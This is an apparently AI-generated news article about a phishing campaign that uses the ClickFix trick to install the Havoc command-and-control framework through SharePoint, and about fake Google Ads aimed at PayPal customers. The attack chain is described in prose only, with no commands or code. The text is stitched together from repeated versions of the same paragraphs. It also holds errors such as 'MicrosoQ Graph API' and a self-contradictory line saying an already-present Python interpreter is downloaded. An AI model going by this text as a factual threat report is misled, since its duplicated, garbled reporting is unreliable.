Ethical Hacking News
A new phishing campaign has been uncovered that leverages the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. This threat actor uses a sophisticated approach to evade detection and trick users into executing malicious PowerShell commands. The campaign also exploits a known loophole in Google Ads policies to target PayPal customers with bogus ads, highlighting the need for increased vigilance in protecting individuals and organizations against emerging threats.
Cybersecurity researchers have discovered a new phishing campaign using the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. The threat actor employs a sophisticated approach to evade detection and trick users into executing malicious PowerShell commands. The campaign also exploits a known loophole in Google Ads policies to target PayPal customers with bogus ads. The use of the Microsoft Graph API helps to conceal C2 communication within well-known services, making it challenging for security researchers to detect. Malwarebytes warns that tech support scammers are exploiting this vulnerability to impersonate popular websites and trick victims into sharing personal and financial information.
Cybersecurity researchers have recently uncovered a new phishing campaign that leverages the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. This threat actor employs a sophisticated approach, utilizing modified versions of existing tools and services to evade detection and trick users into executing malicious PowerShell commands.
At the heart of this campaign is a phishing email containing an HTML attachment ("Documents.html") that, when opened, displays an error message using the ClickFix technique. This error message tricks users into copying and executing a malicious PowerShell command into their terminal or PowerShell, thereby triggering the next-stage of the attack. The initial stage downloads and executes a PowerShell script hosted on an adversary-controlled SharePoint server.
The newly downloaded PowerShell script then checks if it is being run within a sandboxed environment before proceeding to download the Python interpreter ("pythonw.exe"), which is already present in the system. This next step involves fetching and executing a Python script from the same SharePoint location that serves as a shellcode loader for KaynLdr, a reflective loader written in C and ASM that is capable of launching an embedded DLL, in this case, the Havoc Demon agent on the infected host.
The Havoc framework supports various features to gather information, perform file operations, carry out command and payload execution, token manipulation, and Kerberos attacks. The threat actor utilizes the Microsoft Graph API to conceal C2 communication within well-known services, making it challenging for security researchers to detect.
Furthermore, Malwarebytes has revealed that threat actors are continuing to exploit a known loophole in Google Ads policies to target PayPal customers with bogus ads served via advertiser accounts that may have been compromised. These ads aim to trick victims searching for assistance related to account issues or payment concerns into calling a fraudulent number that likely ends with them handing over their personal and financial information.
Jérôme Segura, senior director of research at Malwarebytes, stated that the weakness within Google's policies for landing pages (also known as final URLs) allows anyone to impersonate popular websites so long as the landing page and display URL (the webpage shown in an ad) share the same domain. Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to any kind of online assistance or customer service.
In recent times, cybersecurity researchers have highlighted various vulnerabilities and threats that pose significant risks to individuals and organizations alike. It is essential for users to remain vigilant and take proactive measures to protect themselves against these emerging threats.
Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known services.
The starting point of the attack is a phishing email containing an HTML attachment ("Documents.html") that, when opened, displays an error message, which uses the ClickFix technique to trick users into copying and executing a malicious PowerShell command into their terminal or PowerShell, thereby triggering the next-stage.
The command is designed to download and execute a PowerShell script hosted on an adversary-controlled SharePoint server. The newly downloaded PowerShell checks if it's being run within a sandboxed environment before proceeding to download the Python interpreter ("pythonw.exe"), if it's not already present in the system.
The next step involves fetching and executing a Python script from the same SharePoint location that serves as a shellcode loader for KaynLdr, a reflective loader written in C and ASM that is capable of launching an embedded DLL, in this case, the Havoc Demon agent on the infected host.
"The threat actor uses Havoc in conjunction with the MicrosoQ Graph API to conceal C2 communication within well-known services," Fortinet said, adding the framework supports features to gather information, perform file operations, as well as carry out command and payload execution, token manipulation, and Kerberos attacks.
The development comes as Malwarebytes revealed that threat actors are continuing to exploit a known loophole in Google Ads policies to target PayPal customers with bogus ads served via advertiser accounts that may have been compromised.
The ads seek to trick victims searching for assistance related to account issues or payment concerns into calling a fraudulent number that likely ends with them handing over their personal and financial information.
"A weakness within Google's policies for landing pages (also known as final URLs), allows anyone to impersonate popular websites so long as the landing page and display URL (the webpage shown in an ad) share the same domain," Jérôme Segura, senior director of research at Malwarebytes, said.
"Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to any kind of online assistance or customer service."
Summary:
A new phishing campaign has been uncovered that leverages the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. This threat actor uses a sophisticated approach to evade detection and trick users into executing malicious PowerShell commands. The campaign also exploits a known loophole in Google Ads policies to target PayPal customers with bogus ads, highlighting the need for increased vigilance in protecting individuals and organizations against emerging threats.
Related Information:
https://www.ethicalhackingnews.com/articles/New-ClickFix-Phishing-Campaign-Deploys-Havoc-C2-Framework-via-SharePoint-Sites-ehn.shtml
https://thehackernews.com/2025/03/hackers-use-clickfix-trick-to-deploy.html
https://www.area51net.com/HOME/articleType/ArticleView/articleId/4864096/Hackers-Use-ClickFix-Trick-to-Deploy-PowerShell-Based-Havoc-C2-via-SharePoint-Sites
Published: Mon Mar 3 09:25:20 2025 by llama3.2 3B Q4_K_M
